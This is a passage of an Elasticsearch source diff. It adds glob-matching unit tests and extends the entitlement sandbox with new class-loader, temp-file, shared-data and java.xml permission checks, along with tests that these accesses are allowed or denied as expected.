Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.core; + +import org.elasticsearch.test.ESTestCase; + +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.is; + +public class GlobTests extends ESTestCase { + + public void testMatchNull() { + assertThat(Glob.globMatch(null, null), is(false)); + assertThat(Glob.globMatch(randomAlphaOfLengthBetween(1, 10), null), is(false)); + assertThat(Glob.globMatch(null, randomAlphaOfLengthBetween(1, 10)), is(false)); + } + + public void testMatchLiteral() { + assertMatch("", ""); + var str = randomAlphaOfLengthBetween(1, 12); + assertMatch(str, str); + + str = randomAlphanumericOfLength(randomIntBetween(1, 12)); + assertMatch(str, str); + + str = randomAsciiStringNoAsterisks(randomIntBetween(1, 24)); + assertMatch(str, str); + } + + public void testSingleAsterisk() { + assertMatch("*", ""); + assertMatch("*", randomAlphaOfLengthBetween(1, 12)); + assertMatch("*", randomAlphanumericOfLength(randomIntBetween(1, 12))); + assertMatch("*", randomAsciiString(randomIntBetween(1, 24), ch -> ch >= ' ' && ch <= '~')); + assertMatch("*", "*".repeat(randomIntBetween(1, 5))); + } + + public void testMultipleConsecutiveAsterisk() { + var pattern = "*".repeat(randomIntBetween(2, 5)); + + assertMatch(pattern, ""); + assertMatch(pattern, randomAlphaOfLengthBetween(1, 12)); + assertMatch(pattern, randomAlphanumericOfLength(randomIntBetween(1, 12))); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 24))); + assertMatch(pattern, "*".repeat(randomIntBetween(1, 5))); + } + + public void testPrefixMatch() { + assertMatch("123*", "123"); + assertMatch("123*", "123abc"); + assertMatch("123*", "123123123"); + assertNonMatch("123*", "12"); + assertNonMatch("123*", "124"); + assertNonMatch("123*", "23"); + assertNonMatch("123*", "23x"); + assertNonMatch("123*", "x23"); + assertNonMatch("123*", "12*"); + assertNonMatch("123*", "12-3"); + assertNonMatch("123*", "1.2.3"); + assertNonMatch("123*", "abc123"); + assertNonMatch("123*", "abc123def"); + + var prefix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = prefix + "*"; + assertMatch(pattern, prefix); + assertMatch(pattern, prefix + randomAsciiString(randomIntBetween(1, 30))); + assertNonMatch( + pattern, + randomValueOtherThanMany(s -> s.charAt(0) == prefix.charAt(0), () -> randomAsciiString(randomIntBetween(1, 30))) + prefix + ); + assertNonMatch(pattern, prefix.substring(0, prefix.length() - 1)); + assertNonMatch(pattern, prefix.substring(1)); + } + + public void testSuffixMatch() { + assertMatch("*123", "123"); + assertMatch("*123", "abc123"); + assertMatch("*123", "123123123"); + assertNonMatch("*123", "12"); + assertNonMatch("*123", "x12"); + assertNonMatch("*123", "23"); + assertNonMatch("*123", "x23"); + assertNonMatch("*123", "12*"); + assertNonMatch("*123", "1.2.3"); + assertNonMatch("*123", "123abc"); + assertNonMatch("*123", "abc123def"); + + var suffix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = "*" + suffix; + assertMatch(pattern, suffix); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 30)) + suffix); + assertNonMatch( + pattern, + randomValueOtherThanMany(str -> str.endsWith(suffix), () -> 
suffix + "#" + randomAsciiString(randomIntBetween(1, 30))) + ); + assertNonMatch(pattern, suffix.substring(0, suffix.length() - 1)); + assertNonMatch(pattern, suffix.substring(1)); + } + + public void testInfixStringMatch() { + assertMatch("*123*", "abc123def"); + assertMatch("*123*", "abc123"); + assertMatch("*123*", "123def"); + assertMatch("*123*", "123"); + assertMatch("*123*", "123123123"); + assertMatch("*123*", "1.12.123.1234"); + assertNonMatch("*123*", "12"); + assertNonMatch("*123*", "23"); + assertNonMatch("*123*", "x23"); + assertNonMatch("*123*", "12*"); + assertNonMatch("*123*", "1.2.3"); + + var infix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = "*" + infix + "*"; + assertMatch(pattern, infix); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 30)) + infix + randomAsciiString(randomIntBetween(1, 30))); + assertMatch(pattern, randomAsciiString(randomIntBetween(1, 30)) + infix); + assertMatch(pattern, infix + randomAsciiString(randomIntBetween(1, 30))); + assertNonMatch(pattern, infix.substring(0, infix.length() - 1)); + assertNonMatch(pattern, infix.substring(1)); + } + + public void testInfixAsteriskMatch() { + assertMatch("abc*xyz", "abcxyz"); + assertMatch("abc*xyz", "abc#xyz"); + assertMatch("abc*xyz", "abc*xyz"); + assertMatch("abc*xyz", "abcdefghijklmnopqrstuvwxyz"); + assertNonMatch("abc*xyz", "ABC.xyz"); + assertNonMatch("abc*xyz", "RabcSxyzT"); + assertNonMatch("abc*xyz", "RabcSxyz"); + assertNonMatch("abc*xyz", "abcSxyzT"); + + assertMatch("123*321", "123321"); + assertMatch("123*321", "12345678987654321"); + assertNonMatch("123*321", "12321"); + + var prefix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var suffix = randomAsciiStringNoAsterisks(randomIntBetween(2, 12)); + var pattern = prefix + "*" + suffix; + assertMatch(pattern, prefix + suffix); + assertMatch(pattern, prefix + randomAsciiString(randomIntBetween(1, 30)) + suffix); + assertNonMatch(pattern, prefix.substring(0, prefix.length() - 1) + suffix); + assertNonMatch(pattern, prefix + suffix.substring(1)); + } + + public void testLiteralSubstringMatching() { + assertMatch("start*middle*end", "startmiddleend"); + assertMatch("start*middle*end", "start.middle.end"); + assertMatch("start*middle*end", "start.middlX.middle.end"); + assertMatch("start*middle*end", "start.middlmiddle.end"); + assertMatch("start*middle*end", "start.middle.eend"); + assertMatch("start*middle*end", "start.middle.enend"); + assertMatch("start*middle*end", "start.middle.endend"); + + assertNonMatch("start*middle*end", "startmiddlend"); + assertNonMatch("start*middle*end", "start.end"); + assertNonMatch("start*middle*end", "start+MIDDLE+end"); + assertNonMatch("start*middle*end", "start+mid+dle+end"); + assertNonMatch("start*middle*end", "start+mid+middle+en"); + } + + private static void assertMatch(String pattern, String str) { + assertThat("Expect [" + str + "] to match '" + pattern + "'", Glob.globMatch(pattern, str), is(true)); + } + + private static void assertNonMatch(String pattern, String str) { + assertThat("Expect [" + str + "] to not match '" + pattern + "'", Glob.globMatch(pattern, str), is(false)); + } + + @FunctionalInterface + interface CharPredicate { + boolean test(char c); + } + + private String randomAsciiString(int length) { + return randomAsciiString(length, ch -> ch >= ' ' && ch <= '~'); + } + + private String randomAsciiStringNoAsterisks(final int length) { + return randomAsciiString(length, ch -> ch >= ' ' && ch <= '~' && ch != '*'); + } + + private String 
randomAsciiString(int length, CharPredicate validCharacters) { + StringBuilder str = new StringBuilder(length); + nextChar: for (int i = 0; i < length; i++) { + for (int attempts = 0; attempts < 200; attempts++) { + char ch = (char) randomIntBetween(0x1, 0x7f); + if (validCharacters.test(ch)) { + str.append(ch); + continue nextChar; + } + } + throw new IllegalStateException("Cannot find valid character for string"); + } + assertThat(str.length(), equalTo(length)); + return str.toString(); + } + +} diff --git a/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java b/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java index 1fd429e6f9fd6..6457eacb14e9f 100644 --- a/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java +++ b/libs/entitlement/bridge/src/main/java/org/elasticsearch/entitlement/bridge/EntitlementChecker.java @@ -136,6 +136,10 @@ public interface EntitlementChecker { void check$java_net_URLClassLoader$(Class callerClass, String name, URL[] urls, ClassLoader parent, URLStreamHandlerFactory factory); + void check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls, ClassLoader parent); + + void check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls); + void check$java_security_SecureClassLoader$(Class callerClass); void check$java_security_SecureClassLoader$(Class callerClass, ClassLoader parent); @@ -771,6 +775,8 @@ public interface EntitlementChecker { void check$java_io_File$createNewFile(Class callerClass, File file); + void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix); + void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix, File directory); void check$java_io_File$delete(Class callerClass, File file); diff --git a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java index e80b0a8580b5e..3ded3e3ac8924 100644 --- a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java +++ b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/FileCheckActions.java @@ -13,6 +13,7 @@ import org.elasticsearch.core.SuppressForbidden; import org.elasticsearch.entitlement.qa.entitled.EntitledActions; import org.elasticsearch.env.Environment; +import org.xml.sax.helpers.DefaultHandler; import java.io.File; import java.io.FileDescriptor; @@ -39,6 +40,7 @@ import java.util.zip.ZipFile; import javax.imageio.stream.FileImageInputStream; +import javax.xml.parsers.SAXParserFactory; import static java.nio.charset.Charset.defaultCharset; import static java.nio.file.StandardOpenOption.CREATE; @@ -97,6 +99,17 @@ static void fileCreateTempFile() throws IOException { File.createTempFile("prefix", "suffix", readWriteDir().toFile()); } + @EntitlementTest(expectedAccess = ALWAYS_ALLOWED) + static void fileCreateTempFileSystemTempDirectory() throws IOException { + File.createTempFile("prefix", "suffix"); + } + + @EntitlementTest(expectedAccess = ALWAYS_ALLOWED) + static void fileCreateTempFileNullDirectory() throws IOException { + // null directory = system temp directory + File.createTempFile("prefix", "suffix", null); + } + @EntitlementTest(expectedAccess = PLUGINS) static void fileDelete() 
throws IOException { var toDelete = EntitledActions.createTempFileForWrite(); @@ -599,5 +612,12 @@ static void javaDesktopFileAccess() throws Exception { new FileImageInputStream(file.toFile()).close(); } + @EntitlementTest(expectedAccess = ALWAYS_DENIED) + static void javaXmlFileRequest() throws Exception { + // java.xml is part of the jdk, but not a system module. this checks it can't access files + var saxParser = SAXParserFactory.newInstance().newSAXParser(); + saxParser.parse(readFile().toFile(), new DefaultHandler()); + } + private FileCheckActions() {} } diff --git a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java index 29e4ffccce0b3..78ffb93a4b9e9 100644 --- a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java +++ b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/JvmActions.java @@ -18,6 +18,9 @@ import java.util.Locale; import java.util.TimeZone; +import javax.xml.parsers.SAXParserFactory; + +import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.ALWAYS_ALLOWED; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.ALWAYS_DENIED; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.PLUGINS; @@ -69,6 +72,20 @@ static void createClassLoader() throws IOException { } } + @EntitlementTest(expectedAccess = PLUGINS) + static void createClassLoaderNewInstance1() throws IOException { + try (var classLoader = URLClassLoader.newInstance(new URL[0])) { + // intentionally empty, just let the loader close + } + } + + @EntitlementTest(expectedAccess = PLUGINS) + static void createClassLoaderNewInstance2() throws IOException { + try (var classLoader = URLClassLoader.newInstance(new URL[0], RestEntitlementsCheckAction.class.getClassLoader())) { + // intentionally empty, just let the loader close + } + } + @EntitlementTest(expectedAccess = ALWAYS_DENIED) static void createLogManager() { new java.util.logging.LogManager() { @@ -80,5 +97,12 @@ static void createLogManager() { Thread.setDefaultUncaughtExceptionHandler(Thread.getDefaultUncaughtExceptionHandler()); } + @EntitlementTest(expectedAccess = ALWAYS_ALLOWED) + static void useJavaXmlParser() { + // java.xml is part of the jdk, but not a system module. 
this checks it's actually usable + // as it needs to read classes from the jdk which is not generally allowed + SAXParserFactory.newInstance(); + } + private JvmActions() {} } diff --git a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java index 7b99aab0a19e4..af82a29c750e9 100644 --- a/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java +++ b/libs/entitlement/qa/entitlement-test-plugin/src/main/java/org/elasticsearch/entitlement/qa/test/NetworkAccessCheckActions.java @@ -10,6 +10,7 @@ package org.elasticsearch.entitlement.qa.test; import org.elasticsearch.core.SuppressForbidden; +import org.xml.sax.helpers.DefaultHandler; import java.io.IOException; import java.net.DatagramPacket; @@ -46,6 +47,7 @@ import javax.net.ssl.HttpsURLConnection; import javax.net.ssl.SSLContext; +import javax.xml.parsers.SAXParserFactory; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.ALWAYS_DENIED; import static org.elasticsearch.entitlement.qa.test.EntitlementTest.ExpectedAccess.PLUGINS; @@ -434,5 +436,12 @@ static void receiveDatagramSocket() throws IOException { } } + @EntitlementTest(expectedAccess = ALWAYS_DENIED) + static void javaXmlNetworkRequest() throws Exception { + // java.xml is part of the jdk, but not a system module. this checks it can't access the network + var saxParser = SAXParserFactory.newInstance().newSAXParser(); + saxParser.parse("http://127.0.0.1/foo.json", new DefaultHandler()); + } + private NetworkAccessCheckActions() {} } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java index be9e8254f464c..7a38ff50a8d6d 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/EntitlementBootstrap.java @@ -46,6 +46,7 @@ public class EntitlementBootstrap { * @param scopeResolver a functor to map a Java Class to the component and module it belongs to. * @param settingResolver a functor to resolve a setting name pattern for one or more Elasticsearch settings. 
* @param dataDirs data directories for Elasticsearch + * @param sharedDataDir shared data directory for Elasticsearch (deprecated) * @param sharedRepoDirs shared repository directories for Elasticsearch * @param configDir the config directory for Elasticsearch * @param libDir the lib directory for Elasticsearch @@ -63,6 +64,7 @@ public static void bootstrap( Function, PolicyManager.PolicyScope> scopeResolver, Function> settingResolver, Path[] dataDirs, + Path sharedDataDir, Path[] sharedRepoDirs, Path configDir, Path libDir, @@ -82,6 +84,7 @@ public static void bootstrap( getUserHome(), configDir, dataDirs, + sharedDataDir, sharedRepoDirs, libDir, modulesDir, @@ -122,7 +125,7 @@ static void loadAgent(String agentPath, String entitlementInitializationClassNam vm.detach(); } } catch (AttachNotSupportedException | IOException | AgentLoadException | AgentInitializationException e) { - throw new IllegalStateException("Unable to attach entitlement agent", e); + throw new IllegalStateException("Unable to attach entitlement agent [" + agentPath + "]", e); } } @@ -161,7 +164,7 @@ private static PolicyManager createPolicyManager( PathLookup pathLookup, Policy serverPolicyPatch, Function, PolicyManager.PolicyScope> scopeResolver, - Map> pluginSourcePaths + Map> pluginSourcePathsResolver ) { FilesEntitlementsValidation.validate(pluginPolicies, pathLookup); @@ -170,7 +173,7 @@ private static PolicyManager createPolicyManager( HardcodedEntitlements.agentEntitlements(), pluginPolicies, scopeResolver, - pluginSourcePaths, + pluginSourcePathsResolver::get, pathLookup ); } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java index 7ac921e29174f..bdc4c92b404aa 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/bootstrap/HardcodedEntitlements.java @@ -21,6 +21,7 @@ import org.elasticsearch.entitlement.runtime.policy.entitlements.LoadNativeLibrariesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ManageThreadsEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.OutboundNetworkEntitlement; +import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadJdkImageEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadStoreAttributesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.SetHttpsConnectionPropertiesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.WriteSystemPropertiesEntitlement; @@ -37,6 +38,7 @@ import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.LOGS; import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.MODULES; import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.PLUGINS; +import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.SHARED_DATA; import static org.elasticsearch.entitlement.runtime.policy.PathLookup.BaseDir.SHARED_REPO; import static org.elasticsearch.entitlement.runtime.policy.Platform.LINUX; import static org.elasticsearch.entitlement.runtime.policy.entitlements.FilesEntitlement.Mode.READ; @@ -57,6 +59,7 @@ private static List createServerEntitlements(Path pidFile) { FilesEntitlement.FileData.ofBaseDirPath(LOGS, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(LIB, 
READ), FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(SHARED_REPO, READ_WRITE), // exclusive settings file FilesEntitlement.FileData.ofRelativePath(Path.of("operator/settings.json"), CONFIG, READ_WRITE).withExclusive(true), @@ -90,8 +93,9 @@ private static List createServerEntitlements(Path pidFile) { new CreateClassLoaderEntitlement(), new FilesEntitlement( List.of( - // TODO: what in es.base is accessing shared repo? + // necessary due to lack of delegation ES-12382 FilesEntitlement.FileData.ofBaseDirPath(SHARED_REPO, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) ) ) @@ -111,6 +115,21 @@ private static List createServerEntitlements(Path pidFile) { ) ), new Scope("java.desktop", List.of(new LoadNativeLibrariesEntitlement())), + new Scope( + "java.xml", + List.of( + new ReadJdkImageEntitlement(), + // java.xml does some reflective stuff that reads calling jars, so allow reading the codebases + // of any code in the system so that they can all use java.xml + new FilesEntitlement( + List.of( + FilesEntitlement.FileData.ofBaseDirPath(LIB, READ), + FilesEntitlement.FileData.ofBaseDirPath(MODULES, READ), + FilesEntitlement.FileData.ofBaseDirPath(PLUGINS, READ) + ) + ) + ) + ), new Scope("org.apache.httpcomponents.httpclient", List.of(new OutboundNetworkEntitlement())), new Scope( "org.apache.lucene.core", @@ -120,6 +139,7 @@ private static List createServerEntitlements(Path pidFile) { new FilesEntitlement( List.of( FilesEntitlement.FileData.ofBaseDirPath(CONFIG, READ), + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) ) ) @@ -128,7 +148,12 @@ private static List createServerEntitlements(Path pidFile) { new Scope( "org.apache.lucene.misc", List.of( - new FilesEntitlement(List.of(FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE))), + new FilesEntitlement( + List.of( + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) + ) + ), new ReadStoreAttributesEntitlement() ) ), @@ -143,7 +168,12 @@ private static List createServerEntitlements(Path pidFile) { "org.elasticsearch.nativeaccess", List.of( new LoadNativeLibrariesEntitlement(), - new FilesEntitlement(List.of(FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE))) + new FilesEntitlement( + List.of( + FilesEntitlement.FileData.ofBaseDirPath(SHARED_DATA, READ_WRITE), + FilesEntitlement.FileData.ofBaseDirPath(DATA, READ_WRITE) + ) + ) ) ) ); diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java index 041fc5db6d704..29d4a3f4d0337 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/ElasticsearchEntitlementChecker.java @@ -194,6 +194,16 @@ public ElasticsearchEntitlementChecker(PolicyChecker policyChecker) { policyChecker.checkCreateClassLoader(callerClass); } + @Override + public void check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls) { + policyChecker.checkCreateClassLoader(callerClass); + } + + @Override + public void 
check$java_net_URLClassLoader$$newInstance(Class callerClass, URL[] urls, ClassLoader parent) { + policyChecker.checkCreateClassLoader(callerClass); + } + @Override public void check$java_security_SecureClassLoader$(Class callerClass) { policyChecker.checkCreateClassLoader(callerClass); @@ -1489,9 +1499,20 @@ public void checkSelectorProviderOpenSocketChannel(Class callerClass, Selecto policyChecker.checkFileWrite(callerClass, file); } + @Override + public void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix) { + policyChecker.checkCreateTempFile(callerClass); + } + @Override public void check$java_io_File$$createTempFile(Class callerClass, String prefix, String suffix, File directory) { - policyChecker.checkFileWrite(callerClass, directory); + // A null value for the directory parameter means using the temp directory (java.io.tmpdir, + // aka org.elasticsearch.env.Environment#tmpDir, aka PathLookup#TEMP). + if (directory == null) { + policyChecker.checkCreateTempFile(callerClass); + } else { + policyChecker.checkFileWrite(callerClass, directory); + } } @Override diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java index 361d77ff83477..2febb301d1ab4 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookup.java @@ -9,6 +9,8 @@ package org.elasticsearch.entitlement.runtime.policy; +import org.elasticsearch.core.PathUtils; + import java.nio.file.Path; import java.util.stream.Stream; @@ -16,10 +18,13 @@ * Resolves paths for known directories checked by entitlements. */ public interface PathLookup { + Class DEFAULT_FILESYSTEM_CLASS = PathUtils.getDefaultFileSystem().getClass(); + enum BaseDir { USER_HOME, CONFIG, DATA, + SHARED_DATA, SHARED_REPO, LIB, MODULES, @@ -37,4 +42,6 @@ enum BaseDir { * paths of the given {@code baseDir}. 
*/ Stream resolveSettingPaths(BaseDir baseDir, String settingName); + + boolean isPathOnDefaultFilesystem(Path path); } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java index e3474250d43f0..d3be1d08ef989 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PathLookupImpl.java @@ -25,6 +25,7 @@ public record PathLookupImpl( Path homeDir, Path configDir, Path[] dataDirs, + Path sharedDataDir, Path[] sharedRepoDirs, Path libDir, Path modulesDir, @@ -56,6 +57,7 @@ public Stream getBaseDirPaths(BaseDir baseDir) { return switch (baseDir) { case USER_HOME -> Stream.of(homeDir); case DATA -> Arrays.stream(dataDirs); + case SHARED_DATA -> Stream.ofNullable(sharedDataDir); case SHARED_REPO -> Arrays.stream(sharedRepoDirs); case CONFIG -> Stream.of(configDir); case LIB -> Stream.of(libDir); @@ -75,4 +77,9 @@ public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { .toList(); return getBaseDirPaths(baseDir).flatMap(path -> relativePaths.stream().map(path::resolve)); } + + @Override + public boolean isPathOnDefaultFilesystem(Path path) { + return path.getFileSystem().getClass() == DEFAULT_FILESYSTEM_CLASS; + } } diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java index 5ea477c177740..e4dcd4758d544 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyCheckerImpl.java @@ -9,7 +9,6 @@ package org.elasticsearch.entitlement.runtime.policy; -import org.elasticsearch.core.PathUtils; import org.elasticsearch.core.Strings; import org.elasticsearch.core.SuppressForbidden; import org.elasticsearch.entitlement.instrumentation.InstrumentationService; @@ -22,6 +21,7 @@ import org.elasticsearch.entitlement.runtime.policy.entitlements.LoadNativeLibrariesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ManageThreadsEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.OutboundNetworkEntitlement; +import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadJdkImageEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.ReadStoreAttributesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.SetHttpsConnectionPropertiesEntitlement; import org.elasticsearch.entitlement.runtime.policy.entitlements.WriteSystemPropertiesEntitlement; @@ -58,7 +58,7 @@ */ @SuppressForbidden(reason = "Explicitly checking APIs that are forbidden") public class PolicyCheckerImpl implements PolicyChecker { - static final Class DEFAULT_FILESYSTEM_CLASS = PathUtils.getDefaultFileSystem().getClass(); + protected final Set suppressFailureLogPackages; /** * Frames originating from this module are ignored in the permission logic. 
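Aside (not part of the patch): a minimal, self-contained sketch of the default-filesystem test that this diff moves onto PathLookup. FileSystems.getDefault() stands in for the PathUtils helper used in the patch, and the class name and zip file here are illustrative only. The point is that a path on a non-default filesystem (here, a zip filesystem) fails the identity comparison and is therefore trivially allowed by the checker.

import java.nio.file.FileSystem;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Map;

public class DefaultFilesystemCheckSketch {

    // Same comparison as PathLookupImpl#isPathOnDefaultFilesystem in this diff,
    // with FileSystems.getDefault() standing in for PathUtils.getDefaultFileSystem().
    static final Class<?> DEFAULT_FILESYSTEM_CLASS = FileSystems.getDefault().getClass();

    static boolean isPathOnDefaultFilesystem(Path path) {
        return path.getFileSystem().getClass() == DEFAULT_FILESYSTEM_CLASS;
    }

    public static void main(String[] args) throws Exception {
        System.out.println(isPathOnDefaultFilesystem(Path.of("example.txt"))); // true

        // A path inside a zip filesystem fails the identity check, so the entitlement
        // checker treats access to it as trivially allowed and skips the policy lookup.
        Path zip = Path.of("sketch.zip");
        try (FileSystem zipFs = FileSystems.newFileSystem(zip, Map.of("create", "true"))) {
            System.out.println(isPathOnDefaultFilesystem(zipFs.getPath("/inside.txt"))); // false
        } finally {
            Files.deleteIfExists(zip);
        }
    }
}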
@@ -81,15 +81,14 @@ public PolicyCheckerImpl( this.pathLookup = pathLookup; } - private static boolean isPathOnDefaultFilesystem(Path path) { - var pathFileSystemClass = path.getFileSystem().getClass(); - if (path.getFileSystem().getClass() != DEFAULT_FILESYSTEM_CLASS) { + private boolean isPathOnDefaultFilesystem(Path path) { + if (pathLookup.isPathOnDefaultFilesystem(path) == false) { PolicyManager.generalLogger.trace( () -> Strings.format( "File entitlement trivially allowed: path [%s] is for a different FileSystem class [%s], default is [%s]", path.toString(), - pathFileSystemClass.getName(), - DEFAULT_FILESYSTEM_CLASS.getName() + path.getFileSystem().getClass().getName(), + PathLookup.DEFAULT_FILESYSTEM_CLASS.getName() ) ); return false; @@ -135,11 +134,11 @@ private void neverEntitled(Class callerClass, Supplier operationDescr Strings.format( "component [%s], module [%s], class [%s], operation [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, operationDescription.get() ), - callerClass, + requestingClass, entitlements ); } @@ -217,7 +216,7 @@ public void checkFileRead(Class callerClass, Path path) { @Override public void checkFileRead(Class callerClass, Path path, boolean followLinks) throws NoSuchFileException { - if (PolicyCheckerImpl.isPathOnDefaultFilesystem(path) == false) { + if (isPathOnDefaultFilesystem(path) == false) { return; } var requestingClass = requestingClass(callerClass); @@ -247,11 +246,11 @@ public void checkFileRead(Class callerClass, Path path, boolean followLinks) Strings.format( "component [%s], module [%s], class [%s], entitlement [file], operation [read], path [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, realPath == null ? 
